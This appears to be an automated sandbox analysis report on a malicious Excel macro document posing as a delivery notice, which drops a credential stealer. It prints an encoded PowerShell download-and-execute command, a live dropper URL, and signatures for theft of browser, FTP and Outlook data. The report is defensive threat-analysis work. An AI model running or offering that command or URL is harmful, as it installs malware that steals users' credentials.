Overview

overview

10

Static

static

8

delivery n...5.xlsm

windows7_x64

10

delivery n...5.xlsm

windows10_x64

10

Analysis

  • max time kernel
    123s
  • max time network
    149s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    21-10-2021 05:55

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    delivery noticefNQSE5.xlsm

  • Size

    389KB

  • MD5

    cf4c3f1e0953167d484fb25ac961db42

  • SHA1

    d946a7e52728e50d6013a65bc0eb008b42b83787

  • SHA256

    81dc79b21940ab4d94fb07cdfc337eaf3879fc4a7ad4eb71751f3c0eaa41061b

  • SHA512

    d83bbff65e3d4d005b405c15708fb41967049ea7dcb059db2ea4b9b4f82a96c490088a91928f85640942ed37a7ff07e5d6391d98ad2c714bb9ab9db2a1331a8e

Score
10/10
collectionpersistencespywarestealer

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://3.64.251.139/vr/r/QA4ty2uUkTCD2tfNQSE5.exe

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 2 IoCs
  • Deletes itself 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

    spywarestealer
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

    spywarestealer
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\delivery noticefNQSE5.xlsm"
    1⤵
    • Deletes itself
    • Checks processor information in registry
    • Enumerates system info in registry
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2500
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Qtkkhrqfym.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2396
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBRAHgAdwBoAGgAdwB4AHoAdABhAHQAYwB6AHIAaQBtAGQAdAAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADMALgA2ADQALgAyADUAMQAuADEAMwA5AC8AdgByAC8AcgAvAFEAQQA0AHQAeQAyAHUAVQBrAFQAQwBEADIAdABmAE4AUQBTAEUANQAuAGUAeABlACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3796
        • C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
          "C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe"
          4⤵
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1916
          • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
            5⤵
            • Executes dropped EXE
            • Accesses Microsoft Outlook profiles
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • outlook_office_path
            • outlook_win_path
            PID:700

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1
T1060

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Credentials in Files

3
T1081

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Data from Local System

3
T1005

Email Collection

1
T1114

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qxwhhwxztatczrimdt.exe.log
    MD5

    605f809fab8c19729d39d075f7ffdb53

    SHA1

    c546f877c9bd53563174a90312a8337fdfc5fdd9

    SHA256

    6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556

    SHA512

    82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
    MD5

    1eada844f6d267f4451b9ffa8eba6624

    SHA1

    11144faece06eb2b3c9c7e19ac3c170b66a351f7

    SHA256

    49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e

    SHA512

    1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

    Download Submit
  • C:\Users\Admin\Documents\Qtkkhrqfym.bat
    MD5

    57cc9b0d215088ba8b5d63024605da81

    SHA1

    cdc02772f2d7ecacbb86ad63e67b1726b36eafc6

    SHA256

    ea7db683263f7447dec974e52fe719b6ed0db751e122d53f57cdd0482d644f70

    SHA512

    bc087ab0e497686213f9a2a03a447009a798936ee8d80d4f652edf8974e0940a20445db82802581acf3b7865c8a00013173f55db365daf2aa31c28bd43bf04e3

    Download Submit
  • memory/700-339-0x0000000004F10000-0x0000000004F11000-memory.dmp
    Filesize

    4KB

    Download
  • memory/700-331-0x00000000004203FE-mapping.dmp
    Download
  • memory/1916-328-0x0000000005260000-0x0000000005261000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1916-321-0x0000000000000000-mapping.dmp
    Download
  • memory/2396-291-0x0000000000000000-mapping.dmp
    Download
  • memory/2500-120-0x000001E07E690000-0x000001E07E692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2500-119-0x00007FFA59100000-0x00007FFA59110000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2500-116-0x00007FFA59100000-0x00007FFA59110000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2500-117-0x00007FFA59100000-0x00007FFA59110000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2500-118-0x00007FFA59100000-0x00007FFA59110000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2500-129-0x00007FFA55590000-0x00007FFA555A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2500-128-0x00007FFA55590000-0x00007FFA555A0000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2500-122-0x000001E07E690000-0x000001E07E692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/2500-115-0x00007FFA59100000-0x00007FFA59110000-memory.dmp
    Filesize

    64KB

    Download
  • memory/2500-121-0x000001E07E690000-0x000001E07E692000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3796-293-0x0000000000000000-mapping.dmp
    Download
  • memory/3796-316-0x000001EAEC726000-0x000001EAEC728000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3796-304-0x000001EAEC723000-0x000001EAEC725000-memory.dmp
    Filesize

    8KB

    Download
  • memory/3796-303-0x000001EAEC720000-0x000001EAEC722000-memory.dmp
    Filesize

    8KB

    Download